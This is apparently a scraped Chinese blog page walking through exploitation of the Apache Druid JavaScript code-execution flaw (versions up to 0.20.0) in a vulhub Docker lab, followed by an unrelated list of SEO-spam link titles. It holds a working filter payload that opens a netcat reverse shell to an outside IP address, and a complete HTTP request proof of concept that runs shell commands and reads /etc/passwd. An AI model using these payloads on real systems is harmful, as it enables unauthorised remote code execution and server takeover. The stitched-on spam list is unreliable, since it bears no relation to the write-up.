当前位置: 首页 > news >正文

wordpress归档页面自定义优化外包哪里好

wordpress归档页面自定义,优化外包哪里好,网站开发filter,郑州网站运营专业乐云seo漏洞详情: Apache Druid 是用Java编写的面向列的开源分布式数据存储系统,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。 Apache Druid含有能够执行嵌入在各种类型请求中由用户提供的JavaScript代码功能。此功能适用于高度信任环境…

漏洞详情:

Apache Druid 是用Java编写的面向列的开源分布式数据存储系统,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。

Apache Druid含有能够执行嵌入在各种类型请求中由用户提供的JavaScript代码功能。此功能适用于高度信任环境,且默认情况下已禁用。但是,在Druid 0.20.0及更早版本中,经过身份验证用户可以构造传入json串来控制某些参数发送恶意的请求,强制Druid为该请求运行用户提供的JavaScript代码。由于Apache Druid默认情况下缺乏授权认证,攻击者可以利用此漏洞在目标机器上执行任意代码,最终可获取服务器的控制权限。该漏洞源于攻击者可利用恶意JSON输入,通过function参数控制Rhino引擎执行的JavaScript代码,进而调用系统命令

影响范围:

Apache Druid <= 0.20.0

漏洞复现:

pull影响范围内的druid版本镜像

docker pull vulhub/apache-druid:0.20.0

运行容器

docker run --rm -i -p 8888:8888 vulhub/docker-druid:0.20.0

开浏览器访问8888端口 ,无需认证可访问Druid console页面:

上传代码块

 Base directory==》quickstart/tutorial 

File filter==》 wikiticker-2015-09-12-sampled.json.gz

在下面这步开始抓包

 

在这里插入⬇️⬇️⬇️ function代码块

, "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('nc 121.43.48.229 9999 -e /bin/sh')}", "": {"enabled": true}}

上传执行指令

反连shell成功🏅

 

也有现成的poc
POST /druid/indexer/v1/sampler HTTP/1.1
Host: your-ip:8888
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"/etc","filter":"passwd"}},"dataSchema":{"dataSource":"test","parser":{"parseSpec":{"format":"javascript","timestampSpec":{},"dimensionsSpec":{},"function":"function(){var a = new java.util.Scanner(java.lang.Runtime.getRuntime().exec([\"sh\",\"-c\",\"id\"]).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:123123,test: a}}","":{"enabled":"true"}}}}},"samplerConfig":{"numRows":10}
}
验证结果 
http://www.dinnco.com/news/5634.html

相关文章:

  • 云浮网站建设上海网络推广服务公司
  • 上虞网站建设哪家好网站设计公司报价
  • 做赌博黑网站赚钱么么合肥网络优化推广公司
  • 大场网站建设牛奶推广软文文章
  • 福田网站建设结业论文关于进一步优化当前疫情防控措施
  • 有没有做每日一图的网站品牌网
  • 长春市政府网站建设现状新开发的app怎么推广
  • 现在还可以做夺宝网站今日头条十大新闻最新
  • 上海微信小程序网站建设10常用的网络营销方法
  • erp系统是什么软件seo综合优化公司
  • 开店装修话做那个网站找工人seo服务深圳
  • 网站报价网络推广哪个好
  • 企业网站策划流程站长统计app软件
  • 云南建站百度账号官网
  • seo网站推广有哪些什么叫关键词举例
  • 怎样做响应式网站企业邮箱域名
  • 深一网站建设百度搜索引擎原理
  • 设计本官方网站 网络服务百度广告搜索引擎
  • 怎么自己建设公司网站网络推广服务协议
  • 资阳网站推广浏览器谷歌手机版下载
  • 自己做的网站容易被黑吗企业网站设计的基本内容包括哪些
  • 南通网站建设招聘西安网站设计公司
  • 马蜂窝网站建设目的网络舆情分析报告模板
  • 怎么用wix做网站宁波seo外包引流推广
  • 北湖区网站建设哪个好搜索引擎排名优化公司
  • 狐表做网站qq空间刷赞网站推广
  • 仪器仪表网站制作真人seo点击平台
  • 网站哪个公司好南京响应式网站建设
  • 做网站首选什么语言零基础seo入门教学
  • 有趣的网站大全全媒体广告加盟